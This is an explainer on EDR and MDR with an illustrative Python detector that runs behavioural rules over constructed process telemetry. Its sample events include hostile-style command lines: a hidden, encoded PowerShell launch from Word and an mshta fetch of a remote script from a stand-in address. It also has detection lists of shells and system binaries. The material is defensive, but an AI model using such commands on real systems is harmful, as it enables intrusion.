What Is Endpoint Detection and Response (EDR)
This guide introduces Endpoint Detection and Response (EDR), a behaviour-based approach to endpoint security, and answers the questions most often asked about it. EDR goes beyond traditional antivirus by continuously monitoring activity on the endpoint, detecting suspicious behaviour and supporting a response before an intrusion progresses. Read on for an in-depth look at EDR and MDR and how they can bolster your organisation's cybersecurity posture.
What is EDR?
EDR stands for Endpoint Detection and Response. It is often described as next-generation endpoint protection because, rather than looking for known malicious files, it continuously collects telemetry from the endpoint (process execution, file and registry changes, memory activity, network connections) and applies behavioural rules to that data to detect attacker activity early in an intrusion, ideally before the attacker reaches their objective. It can also be configured to remediate automatically when a host is compromised, for example by killing the offending process or isolating the host from the network.
What is the difference between EDR and Endpoint Protection (AV)?
The short answer is: Endpoint Protection (anti-virus) looks for known malicious files, that is, evidence that a compromise has already happened, whereas EDR looks for the malicious behaviour that precedes or accompanies a compromise.
Traditional Endpoint Protection is file-focused. It scans files on disk, on a schedule or when they are accessed, and compares them against signatures of known malware. It therefore detects a threat only once that threat exists on the host as a recognisable file, which is why a repacked or previously unseen sample can slip past it. It is anti-virus and, by extension, anti-malware.
By contrast, EDR uses multiple monitoring points to detect attempts to compromise the system. It records process creation and command lines, memory and code-injection activity, file and registry changes, and network connections, and evaluates that telemetry against a rule set describing common attack techniques (for example, an Office application spawning a command shell, or a PowerShell process launched with an encoded command), so that a threat can be stopped before it changes files or exfiltrates data.
Traditional endpoint protection is still a requirement for many organisations, and an EDR solution complements it for the best possible endpoint coverage.
What does EDR do well?
By design, EDR is meant to proactively detect behaviours that indicate a threat, attack, or compromise. Its scope of detection on the endpoint is wider, and its agent is often less obtrusive and less resource-hungry than a heavy endpoint protection client, because it records events as they happen rather than repeatedly scanning the whole disk.
In general, EDR is also designed to be integrated with other products in the environment. Whether it is shipping telemetry to a SIEM or exposing an API for a customised response, it is meant to be highly configurable and tunable.
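The contrast drawn above, a file-hash check beside behavioural rules over process telemetry, with the resulting alerts serialised as JSON lines for a SIEM, is shown below as an added example. It is illustrative code written for this page, not code from any EDR product. The process events, the "known bad" hash, the parent-child rules and the suppression entry are all constructed; the ATT&CK technique tags are the standard public identifiers for the behaviours the rules look for.

```python
"""Added example: AV-style hash matching beside EDR-style behavioural rules
over constructed process-creation telemetry. Not from any real product."""
import hashlib
import json
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional


@dataclass
class ProcessEvent:
    """One process-creation record, as an EDR agent would report it (constructed)."""
    host: str
    pid: int
    image: str            # path of the executable that started
    parent_image: str     # path of the process that started it
    cmdline: str
    file_sha256: str      # hash of the executable on disk
    dst_ip: Optional[str] = None     # first outbound connection, if any
    dst_port: Optional[int] = None


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# ---- file-centric check (what traditional AV does) ----
# Constructed "known bad" hash; it fires only if this exact file is seen again.
KNOWN_BAD_SHA256 = {
    hashlib.sha256(b"constructed-malware-sample").hexdigest(): "Constructed.Dropper",
}


def av_match(ev: ProcessEvent) -> Optional[str]:
    return KNOWN_BAD_SHA256.get(ev.file_sha256)


# ---- behavioural rules (what EDR adds) ----
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
LOLBINS = {"mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand, so match the common ones.
ENCODED_PS = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")


def office_spawns_shell(ev):            # macro or exploit in a document launching a shell
    if basename(ev.parent_image) in OFFICE and basename(ev.image) in SHELLS:
        return ("office_spawns_shell", "high", "T1566.001")


def encoded_powershell(ev):             # obfuscated PowerShell payload
    if basename(ev.image) == "powershell.exe" and ENCODED_PS.search(ev.cmdline):
        return ("encoded_powershell", "medium", "T1059.001")


def lolbin_outbound(ev):                # signed system binary fetching remote content
    if basename(ev.image) in LOLBINS and ev.dst_ip:
        return ("lolbin_outbound_connection", "high", "T1218")


RULES: List[Callable] = [office_spawns_shell, encoded_powershell, lolbin_outbound]

# Tuning to cut noise: suppress one rule for one exact parent path (constructed vendor path).
# Keep exceptions this narrow; "ignore rule X everywhere" is how intrusions get missed.
SUPPRESSIONS = {("encoded_powershell", r"c:\program files\constructedcorp\cm-agent\cmagent.exe")}


def evaluate(ev: ProcessEvent) -> List[Dict]:
    """Run every behavioural rule over one event; return the alerts that survive tuning."""
    alerts = []
    for rule in RULES:
        hit = rule(ev)
        if hit and (hit[0], ev.parent_image.lower()) not in SUPPRESSIONS:
            alerts.append({"host": ev.host, "pid": ev.pid, "rule": hit[0], "severity": hit[1],
                           "technique": hit[2], "image": ev.image, "parent": ev.parent_image,
                           "cmdline": ev.cmdline})
    return alerts


def to_siem_lines(alerts: List[Dict]) -> List[str]:
    """One JSON object per line, the shape most SIEM log shippers accept."""
    return [json.dumps(a, sort_keys=True) for a in alerts]


def run(events: List[ProcessEvent]) -> Dict:
    return {"av_hits": sum(1 for ev in events if av_match(ev)),
            "edr_alerts": [a for ev in events for a in evaluate(ev)]}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [  # constructed telemetry from one workstation
    # Phishing macro: Word launches hidden, encoded PowerShell. The binary is the
    # legitimate powershell.exe, so no file hash will ever match it.
    ProcessEvent("ws01", 4120, PS, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
                 hashlib.sha256(b"legit-powershell").hexdigest()),
    # Benign browser launch.
    ProcessEvent("ws01", 4131, r"C:\Program Files\Google\Chrome\Application\chrome.exe", EXPLORER,
                 '"chrome.exe"', hashlib.sha256(b"chrome").hexdigest()),
    # Known dropper run from Downloads: the one case the hash check handles.
    ProcessEvent("ws01", 4150, r"C:\Users\alice\Downloads\invoice.exe", EXPLORER, "invoice.exe",
                 hashlib.sha256(b"constructed-malware-sample").hexdigest()),
    # mshta pulling a script from a documentation-range address (TEST-NET-3).
    ProcessEvent("ws01", 4162, r"C:\Windows\System32\mshta.exe", EXPLORER,
                 "mshta.exe http://203.0.113.10/x.hta", hashlib.sha256(b"mshta").hexdigest(),
                 dst_ip="203.0.113.10", dst_port=80),
    # Same encoded-PowerShell pattern from the approved management agent: tuned out.
    ProcessEvent("ws01", 4170, PS, r"C:\Program Files\ConstructedCorp\cm-agent\cmagent.exe",
                 "powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
                 hashlib.sha256(b"legit-powershell").hexdigest()),
]

if __name__ == "__main__":
    for line in to_siem_lines(run(SAMPLE_EVENTS)["edr_alerts"]):
        print(line)
```

Run as a script it prints three alerts: two for the Word-spawned PowerShell (neither of which the hash check could ever produce, since the executable is Microsoft's own), and one for mshta reaching out, while the dropper is caught only by the hash and the management agent's encoded command is silently suppressed. That last suppression is exactly the tuning decision the analyst has to own: it is scoped to one rule and one parent path, and anyone who can write to that path can now hide behind it.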
Where does EDR fall short?
While EDR sounds like the superior defence, that comes at a cost: complexity. EDR solutions generate vast quantities of telemetry which must be shipped off the endpoint, and for an organisation of any significant size the storage and retention requirements can be substantial.
EDR is also configuration-heavy. While endpoint protection is one install and a signature feed from the vendor, EDR involves configuring what telemetry is collected, where it is shipped for analysis, and the rules and response actions themselves. If that analysis happens in the cloud, there is a lag between an event on the endpoint and its detection, and an endpoint that is offline, or whose agent has been disabled, produces no telemetry at all.
Finally, EDR can flag suspicious activity with a high degree of confidence, but those findings are of little use without a human analyst to verify them and decide on a course of action. If the data volume is huge and the alerts are noisy, the chances of a quick response are low.
What is MDR?
Managed Detection and Response, or MDR (sometimes described as managed EDR), is a refinement of the EDR concept. It is a managed security service in which a technically strong team of analysts reviews EDR data, determines which of it is useful and which is not, and tunes the system to be more efficient and accurate at finding and reporting threats. This team also configures the EDR to respond to identified threats automatically.
What is the difference between MDR and Threat Hunting? Is Threat Hunting the same thing as MDR?
MDR is essentially outsourced threat hunting by analysts who understand your network(s) and the technologies in use, and who can therefore put the most effective strategies for finding threats into practice.
What makes an MDR service successful?
A successful MDR service is a collaboration between teams.
The MDR team provides comprehensive knowledge and experience of the types of threats and how to mitigate them, as well as of the methods by which the most effective detection and automated response can be achieved. This is accomplished using any number of popular EDR products.
The customer's team provides the necessary access to, and data from, their organisation's network and endpoints, as well as any intelligence collected from prior incidents or engagements.